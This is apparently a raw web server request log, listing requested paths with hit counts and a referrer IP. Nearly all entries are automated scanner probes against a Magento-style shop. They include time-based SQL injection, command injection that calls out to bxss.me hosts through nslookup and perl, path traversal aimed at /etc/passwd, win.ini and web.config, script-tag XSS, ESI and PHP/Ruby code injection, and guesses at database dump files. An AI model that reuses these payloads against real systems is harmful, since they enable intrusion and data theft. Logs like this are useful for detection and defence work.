/`(nslookup%20hitkbffyhufdf85096.bxss.me||perl%20-e%20\"gethostbyname('hitkbffyhufdf85096.bxss.me')\")`/js/mage/adminhtml/wysiwyg/ 1 -
/acc/index.php/install/wizard/beginPost//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 -
/bxss.me/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/15owKotp'%20OR%20929=(SELECT%20929%20FROM%20PG_SLEEP(15))--/js/mage/ 1 https://104.36.149.61/
/QAIHbO3R/js/varien/form.js 1 https://104.36.149.61/
/echo%20oapbdr$()\\%20crrraq\\nz^xyu||a%20%23'%20&echo%20oapbdr$()\\%20crrraq\\nz^xyu||a%20%23|\"%20&echo%20oapbdr$()\\%20crrraq\\nz^xyu||a%20%23/js/mage/adminhtml/giftoptions/ 1 -
/4X7lQ9jg'))%20OR%20840=(SELECT%20840%20FROM%20PG_SLEEP(15))--/js/prototype/validation.js 1 https://104.36.149.61/
/acc//mage/ 1 https://104.36.149.61/
/dniapi/userInfos 1 -
/acc/.%2fskin/install/default/default/css/reset.css 1 https://104.36.149.61/
/query 4 -
/ecp/slZ.js 1 -
/echo%20ecbzjq$()\\%20jvwbqa\\nz^xyu||a%20%23'%20&echo%20ecbzjq$()\\%20jvwbqa\\nz^xyu||a%20%23|\"%20&echo%20ecbzjq$()\\%20jvwbqa\\nz^xyu||a%20%23/js/mage/adminhtml/form.js 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/tooltip.js 1 -
/104-database.tgz 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'THBo'='THBo/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/authenticationendpoint/help.jsp 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/form.js 1 -
/1'\"/js/prototype/windows/themes/ 1 https://104.36.149.61/
/Rakefile 1 -
/|(nslookup%20hittfdrzpdfxkfd85e.bxss.me||perl%20-e%20\"gethostbyname('hittfdrzpdfxkfd85e.bxss.me')\")/skin/install/default/default/css/boxes.css 1 -
/'.gethostbyname(lc('hitud'.'ygthvtqb0571c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(71).chr(115).chr(66).'/js/mage/adminhtml/giftmessage.js 1 -
/acc/js/prototype/windows/12345'\"\\'\\\") 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc'||'/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/skin/install/default/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/css/clears.css 1 -
/acc/js/mage/%2fxfs.bxss.me/ 1 -
/bxss.me/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/index.php/install/wizard//../../../../../../../../etc/passwd%00en 1 -
/database.tgz 1 -
/administrator/components/com_joomleague/assets/classes/php-ofc-library/ofc_upload_image.php 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'cFho'!='cFho%25/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/skin'\"()&%25<acx><ScRiPt%20>eCQQ(9833)<%2fScRiPt>/install/default/default/css/clears.css 1 https://104.36.149.61/
/&echo%20wolymb$()\\%20wkqzwl\\nz^xyu||a%20%23'%20&echo%20wolymb$()\\%20wkqzwl\\nz^xyu||a%20%23|\"%20&echo%20wolymb$()\\%20wkqzwl\\nz^xyu||a%20%23/skin/adminhtml/default/ 1 -
/.%2facc/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/1'\"/skin/adminhtml/ 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/varien/form.js 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/prototype/ 1 https://104.36.149.61/
/acc/js/%3b(nslookup%20hittkqkvbbamuab9d4.bxss.me||perl%20-e%20\"gethostbyname('hittkqkvbbamuab9d4.bxss.me')\")|(nslookup%20hittkqkvbbamuab9d4.bxss.me||perl%20-e%20\"gethostbyname('hittkqkvbbamuab9d4.bxss.me')\")&(nslookup%20hittkqkvbbamuab9d4.bxss.me||per 1 -
/acc/index.php/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/)/index.php/install/ 1 https://104.36.149.61/
/acc/skin/install/'\"()&%25<acx><ScRiPt%20>Lssw(9883)<%2fScRiPt>/default/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/ 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/ 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/images/../../../../../../../../../../../../../etc/shells 1 -
/acc/js/mage/captcha.js/935368%40 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//../../../../../../../../windows/win.ini%00en 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/skin/install/default/default/ 1 -
/.%2facc/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/'.gethostbyname(lc('hitzh'.'rgjzbsrsccebb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(69).chr(110).chr(90).'/js/prototype/ 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/../../../web.config 1 -
/104_dump.sql 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/backup.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/scriptaculous/effects.js 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/skin/adminhtml/ 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/validation.js 1 -
/acc/js/..%2fscriptaculous/effects.js 1 https://104.36.149.61/
/${9999742+10000485}/index.php/install/wizard/config/ 1 -
//js/mage/ 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/|(nslookup%20hitqbanlyvgrgc7763.bxss.me||perl%20-e%20\"gethostbyname('hitqbanlyvgrgc7763.bxss.me')\")/skin/install/default/default/css/clears.css 1 -
/acc/js/..%2fmage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/translate.js 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'MkDm'!='MkDm%25/skin/adminhtml/default/ 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/index.php/../../../web.config 1 -
/..%2facc/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/${@print(md5(31337))}/js/scriptaculous/effects.js 1 -
/ROKp 1 -
/cgi-bin/.viminfo 1 -
/pma/ 1 -
/${@print(md5(31337))}/js/prototype/prototype.js 1 -
/0dYn3xDT'%20OR%20579=(SELECT%20579%20FROM%20PG_SLEEP(15))--/skin/install/default/default/ 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/debug.js 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>ZcmW(9847)<%2fScRiPt>/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/events.js 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/product/ 1 -
/acc/skin/install/default'\"()&%25<acx><ScRiPt%20>dgnk(9497)<%2fScRiPt>/default/css/iestyles.css 1 https://104.36.149.61/
/response.write(9878539*9854552)/js/prototype/validation.js 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/prototype/tooltip_manager.js 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/skin/adminhtml/ 1 https://104.36.149.61/
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 30 -
/\"+response.write(9173975*9024629)+\"/skin/install/default/default/css/iestyles.css 1 -
/index.php 32 -
/`(nslookup%20hitofqyciduqne1433.bxss.me||perl%20-e%20\"gethostbyname('hitofqyciduqne1433.bxss.me')\")`/js/varien/js.js 1 -
/acc/index.php/install/wizard/config//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini 1 -
/acc/skin/%3b(nslookup%20hittccnhyjjnh44e1a.bxss.me||perl%20-e%20\"gethostbyname('hittccnhyjjnh44e1a.bxss.me')\")|(nslookup%20hittccnhyjjnh44e1a.bxss.me||perl%20-e%20\"gethostbyname('hittccnhyjjnh44e1a.bxss.me')\")&(nslookup%20hittccnhyjjnh44e1a.bxss.me||p 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'mpI9'!='mpI9%25/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/install/default/default/css/iestyles.css 1 https://104.36.149.61/
//global.inc.php 1 -
/acc/skin/install/default/default/css<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/iestyles.css 1 -
/'\"/js/prototype/extended_debug.js 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/validation.js 1 https://104.36.149.61/
/acc/skin/install/default/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/css/reset.css 1 https://104.36.149.61/
/jscripts/tinymce 1 -
/acc/js/%3b(nslookup%20hithyfqvkhelc71b00.bxss.me||perl%20-e%20\"gethostbyname('hithyfqvkhelc71b00.bxss.me')\")|(nslookup%20hithyfqvkhelc71b00.bxss.me||perl%20-e%20\"gethostbyname('hithyfqvkhelc71b00.bxss.me')\")&(nslookup%20hithyfqvkhelc71b00.bxss.me||per 1 -
/acc//mage/adminhtml/form.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/jQuery-File-Upload/server/php/ 1 -
/O4aoLvGF/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2fGemfile 1 -
//%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\/etc/passwd 1 -
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/<!--/skin/install/default/default/css/boxes.css 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/prototype/prototype.js 1 https://104.36.149.61/
/Gemfile.lock 1 -
/'\"/js/mage/translate.js 1 -
/acc/.%2fskin/install/default/ 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/tooltip_manager.js 1 https://104.36.149.61/
/app.js 1 -
/YrkrUupi'%20OR%20769=(SELECT%20769%20FROM%20PG_SLEEP(15))--/skin/adminhtml/ 1 https://104.36.149.61/
//config.inc 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/giftoptions/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/tooltip.js 1 https://104.36.149.61/
/acc/index.php//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/win.ini 1 -
//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd 1 -
/'\"()&%25<acx><ScRiPt%20>q8Xa(9970)<%2fScRiPt>/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hiteh'.'losydmlz7974d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(72).chr(107).chr(84).'/skin/install/default/default/css/clears.css 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc/js/mage/%3b(nslookup%20hitdoxznohbtc12b42.bxss.me||perl%20-e%20\"gethostbyname('hitdoxznohbtc12b42.bxss.me')\")|(nslookup%20hitdoxznohbtc12b42.bxss.me||perl%20-e%20\"gethostbyname('hitdoxznohbtc12b42.bxss.me')\")&(nslookup%20hitdoxznohbtc12b42.bxss.me 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/grid.js 1 -
/acc/js/prototype/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500.js 1 -
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/css/ie7minus.css 1 https://104.36.149.61/
/104-dump.rar 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(121).concat(67).concat(109).concat(74)+(require\"socket\"%0aSocket.gethostbyname(\"hityn\"+\"qmbxhjju10067.bxss.me.\")[3].to_s)+\"/skin/adminhtml/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/tooltip.js 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/index.php/install/ 1 -
/\"+\"A\".concat(70-3).concat(22*4).concat(111).concat(71).concat(108).concat(84)+(require\"socket\"%0aSocket.gethostbyname(\"hitwh\"+\"qnakqtkef0e99.bxss.me.\")[3].to_s)+\"/skin/install/default/default/ 1 -
/db.sql 1 -
/\".gethostbyname(lc(\"hithi\".\"xnbrxmsp476f2.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(111).chr(75).chr(106).chr(67).\"/js/mage/adminhtml/events.js 1 -
/104.36.149.61.sql 1 -
/%3b(nslookup%20hitibwidmrfzoeda5c.bxss.me||perl%20-e%20\"gethostbyname('hitibwidmrfzoeda5c.bxss.me')\")|(nslookup%20hitibwidmrfzoeda5c.bxss.me||perl%20-e%20\"gethostbyname('hitibwidmrfzoeda5c.bxss.me')\")&(nslookup%20hitibwidmrfzoeda5c.bxss.me||perl%20-e% 1 -
/dEHMustC'%20OR%20809=(SELECT%20809%20FROM%20PG_SLEEP(15))--/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitxqpwulwxml4d588.bxss.me||perl%20-e%20\"gethostbyname('hitxqpwulwxml4d588.bxss.me')\")|(nslookup%20hitxqpwulwxml4d588.bxss.me||perl%20-e%20\"gethostbyname('hitxqpwulwxml4d588.bxss.me')\")&(nslookup%20hitxqpwulwxml4d588.bxss.me||perl%2 1 -
/'\"()&%25<acx><ScRiPt%20>gumy(9349)<%2fScRiPt>/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/prototype/tooltip.js 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/default/ 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
//./WEB-INF/web.xml%C0%80.jsp 1 -
/Http://bxss.me/t/fit.txt/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
//%C0%AE%C0%AE/WEB-INF/web.xml 1 -
/|echo%20stxelm$()\\%20zinnan\\nz^xyu||a%20%23'%20|echo%20stxelm$()\\%20zinnan\\nz^xyu||a%20%23|\"%20|echo%20stxelm$()\\%20zinnan\\nz^xyu||a%20%23/js/mage/adminhtml/uploader/ 1 -
/-1%20OR%203+954-954-1=0+0+0+1/js/mage/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>kUNn(9844)<%2fScRiPt>/sales/ 1 https://104.36.149.61/
/'\"/js/prototype/validation.js 1 -
/${9999224+10000360}/js/prototype/windows/themes/ 1 -
/acc/js/mage/.%2fadminhtml/wysiwyg/ 1 https://104.36.149.61/
/ZfV4W6rl'%3b%20waitfor%20delay%20'0:0:15'%20--%20/index.php/install/ 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/giftoptions/ 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/windows/themes/ 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(117).concat(89).concat(112).concat(81)+(require\"socket\"%0aSocket.gethostbyname(\"hitte\"+\"yoegbtgkbd7da.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/product/ 1 -
/response.write(9901155*9552789)/js/prototype/tooltip.js 1 -
/acc/js/scriptaculous/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f.js 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/index.php/install/ 1 -
/Vagrantfile.backup 1 -
/.%2facc/skin/install/default/ 1 https://104.36.149.61/
/&echo%20jjvwsg$()\\%20tfzhlu\\nz^xyu||a%20%23'%20&echo%20jjvwsg$()\\%20tfzhlu\\nz^xyu||a%20%23|\"%20&echo%20jjvwsg$()\\%20tfzhlu\\nz^xyu||a%20%23/js/prototype/tooltip.js 1 -
/nZLq89Q0'%20OR%20468=(SELECT%20468%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/<!--/js/prototype/windows/themes/ 1 -
/acc/js/prototype/%3b(nslookup%20hitgovyubjndg056ea.bxss.me||perl%20-e%20\"gethostbyname('hitgovyubjndg056ea.bxss.me')\")|(nslookup%20hitgovyubjndg056ea.bxss.me||perl%20-e%20\"gethostbyname('hitgovyubjndg056ea.bxss.me')\")&(nslookup%20hitgovyubjndg056ea.bx 1 -
/acc'||'/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/prototype/ 1 -
/rst.php 1 -
//..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini 1 -
/EHayuVPd'))%20OR%20976=(SELECT%20976%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
//%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\windows/win.ini 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/mage/.%2fadminhtml/product/ 1 https://104.36.149.61/
/${9999660+9999424}/skin/install/default/default/css/ie7minus.css 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/grid.js 1 -
/acc/index.php/1some_inexistent_file_with_long_name%00.jpg/wizard/locale/ 1 https://104.36.149.61/
/&echo%20nnssaz$()\\%20vgqxij\\nz^xyu||a%20%23'%20&echo%20nnssaz$()\\%20vgqxij\\nz^xyu||a%20%23|\"%20&echo%20nnssaz$()\\%20vgqxij\\nz^xyu||a%20%23/js/scriptaculous/effects.js 1 -
/.%2facc/skin/adminhtml/default/ 1 https://104.36.149.61/
/@@5TNe9/skin/install/default/default/ 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/wysiwyg/ 1 -
/acc/skin/install/default/%3b(nslookup%20hitotdzjzcixr862b0.bxss.me||perl%20-e%20\"gethostbyname('hitotdzjzcixr862b0.bxss.me')\")|(nslookup%20hitotdzjzcixr862b0.bxss.me||perl%20-e%20\"gethostbyname('hitotdzjzcixr862b0.bxss.me')\")&(nslookup%20hitotdzjzcixr 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'w2jT'='w2jT/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/frontend/ 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/js/prototype/windows/themes/ 1 -
/acc/js/prototype/windows/%3b(nslookup%20hitpbapqvnkdzf894e.bxss.me||perl%20-e%20\"gethostbyname('hitpbapqvnkdzf894e.bxss.me')\")|(nslookup%20hitpbapqvnkdzf894e.bxss.me||perl%20-e%20\"gethostbyname('hitpbapqvnkdzf894e.bxss.me')\")&(nslookup%20hitpbapqvnkdz 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/sales/ 1 -
/`(nslookup%20hitllavlpszewece53.bxss.me||perl%20-e%20\"gethostbyname('hitllavlpszewece53.bxss.me')\")`/skin/install/default/default/css/iestyles.css 1 -
/response.write(9416362*9936609)/js/mage/adminhtml/ 1 -
/\".gethostbyname(lc(\"hithh\".\"wuvistvu64d3d.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(111).chr(73).chr(117).chr(67).\"/js/varien/form.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/js/varien/.%2fform.js 1 https://104.36.149.61/
/acc/js/mage/..%2fadminhtml/product/ 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/scriptaculous/effects.js 1 -
/'\"/js/mage/adminhtml/wysiwyg/ 1 -
/&(nslookup%20hitqybbdsbyvu7c2d4.bxss.me||perl%20-e%20\"gethostbyname('hitqybbdsbyvu7c2d4.bxss.me')\")&'\\\"`0&(nslookup%20hitqybbdsbyvu7c2d4.bxss.me||perl%20-e%20\"gethostbyname('hitqybbdsbyvu7c2d4.bxss.me')\")&`'/index.php/install/wizard/locale/ 1 -
/..%2facc/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/hash.js 1 -
/${@print(md5(31337))}\\/js/mage/adminhtml/giftoptions/ 1 -
/acc/index.php/install/wizard/config/..%2fpackage-lock.json 1 -
/'.print(md5(31337)).'/skin/install/default/default/css/ie7minus.css 1 -
/database.tar.gz 1 -
/if(now()=sysdate(),sleep(15),0)/js/prototype/debug.js 1 https://104.36.149.61/
/acc/.%2fjs/prototype/extended_debug.js 1 https://104.36.149.61/
/${10000140+10000389}/js/mage/adminhtml/wysiwyg/ 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/../../../package.json 1 -
/'\"()&%25<acx><ScRiPt%20>sjVf(9275)<%2fScRiPt>/js/prototype/windows/themes/ 1 https://104.36.149.61/
/response.write(9144333*9885293)/js/mage/adminhtml/wysiwyg/ 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/prototype/windows/ 1 https://104.36.149.61/
/${@print(md5(31337))}/js/prototype/validation.js 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'i5i4'='i5i4/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/uploader/ 1 https://104.36.149.61/
/ 208 -
/acc/index.php/install/wizard//../../../../../../../../windows/win.ini 2 -
/1'\"/skin/adminhtml/default/ 1 https://104.36.149.61/
/|echo%20oxmlpq$()\\%20mhkjnn\\nz^xyu||a%20%23'%20|echo%20oxmlpq$()\\%20mhkjnn\\nz^xyu||a%20%23|\"%20|echo%20oxmlpq$()\\%20mhkjnn\\nz^xyu||a%20%23/skin/install/default/default/css/iestyles.css 1 -
/'+'A'.concat(70-3).concat(22*4).concat(117).concat(87).concat(103).concat(66)+(require'socket'%0aSocket.gethostbyname('hitdo'+'broygddvd2d6d.bxss.me.')[3].to_s)+'/skin/install/default/default/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/..%2f..%2f..%2f..%2f..%2fGemfile 1 -
/'%3bprint(md5(31337))%3b$a='/js/mage/adminhtml/product/ 1 -
/acc/index.php/install//../../../WEB-INF/web.xml 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"2udD\"=\"2udD/js/prototype/windows/themes/ 1 https://104.36.149.61/
/acc/index.php/..%2f..%2fpackage.json 1 -
/eam/vib 1 -
/\"+response.write(9954991*9023959)+\"/js/mage/adminhtml/sales/ 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/uploader/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/frontend/ 1 https://104.36.149.61/
/k4NbdaD5')%20OR%20597=(SELECT%20597%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/form.js 1 -
/'+response.write(9864369*9044517)+'/js/varien/form.js 1 -
/acc/js/%3b(nslookup%20hitwucxhlqujr2c9da.bxss.me||perl%20-e%20\"gethostbyname('hitwucxhlqujr2c9da.bxss.me')\")|(nslookup%20hitwucxhlqujr2c9da.bxss.me||perl%20-e%20\"gethostbyname('hitwucxhlqujr2c9da.bxss.me')\")&(nslookup%20hitwucxhlqujr2c9da.bxss.me||per 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/skin/frontend/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/../../../../../Gemfile 1 -
/config.xml 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/install/default/ 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/form.js 1 -
/W287n8Xc'%20OR%20639=(SELECT%20639%20FROM%20PG_SLEEP(15))--/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/skin/install/default/default'\"()&%25<acx><ScRiPt%20>eCQQ(9424)<%2fScRiPt>/css/clears.css 1 https://104.36.149.61/
//config.php 1 -
/104db.7z 1 -
/includes/js/tiny_mce 1 -
/response.write(9567693*9061005)/skin/install/default/default/css/clears.css 1 -
/&echo%20fqudnv$()\\%20vztfgr\\nz^xyu||a%20%23'%20&echo%20fqudnv$()\\%20vztfgr\\nz^xyu||a%20%23|\"%20&echo%20fqudnv$()\\%20vztfgr\\nz^xyu||a%20%23/skin/install/default/ 1 -
/acc/index.php/install/wizard/locale/..%2f..%2f..%2f..%2f..%2fpackage.json 1 -
/104_backup.sql.gz 1 -
